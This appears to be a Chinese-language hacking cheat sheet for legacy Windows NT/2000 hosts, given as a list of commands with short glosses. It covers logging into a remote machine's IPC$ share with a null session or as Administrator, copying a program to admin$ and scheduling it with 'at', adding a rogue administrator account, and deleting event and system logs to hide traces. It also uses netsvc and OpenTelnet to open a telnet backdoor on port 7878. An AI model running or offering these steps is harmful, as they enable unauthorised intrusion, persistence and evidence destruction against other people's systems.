(與遠程主機建立空管連接) net use //IP地址/ipc$ "" /use:"" (以管理員身份登錄遠程主機) net use //IP地址/ipc$ "密碼" /use:"Administrator" (傳送文件到遠程主機WINNT目錄下)copy 本機目錄路徑/程序 //IP地址/admin$ (查看遠程主機時間) net time //IP地址 (定時啟動某個程序) at //IP地址 02:18 readme.exe (查看共享) net view //IP地址 (查看netbios工作組列表) nbtstat -A IP地址 (將遠程主機C盤映射為自己的F盤) net use f: //IP地址/c$ ""/user:"Administrator" (這兩條把自己增加到管理員組): net user 用戶名 密碼 /add net localgroup Administrators 用戶名 /add (斷開連接) net use //IP地址/ipc$ /delete 掃尾: del C:/winnt/system32/logfiles/*.* del C:/winnt/ssytem32/config/*.evt del C:/winnt/system32/dtclog/*.* del C:/winnt/system32/*.log del C:/winnt/system32/*.txt del C:/winnt/*.txt del C:/winnt/*.log 一、netsvc.exe 下面的命令分別是列出主機上的服務項目、查尋和遠程啟動主機的“時間任務”服務: netsvc /list //IP地址 netsvc schedule //IP地址 /query netsvc //IP地址 schedule /start 二、OpenTelnet.exe 遠程啟動主機的Telnet服務,并綁定端口到7878,例如: OpenTelnet //IP地址 用戶名 密碼 1 7878 然后就可以telnet到主機的7878端口,進入DOS方式下: telnet IP地址 7878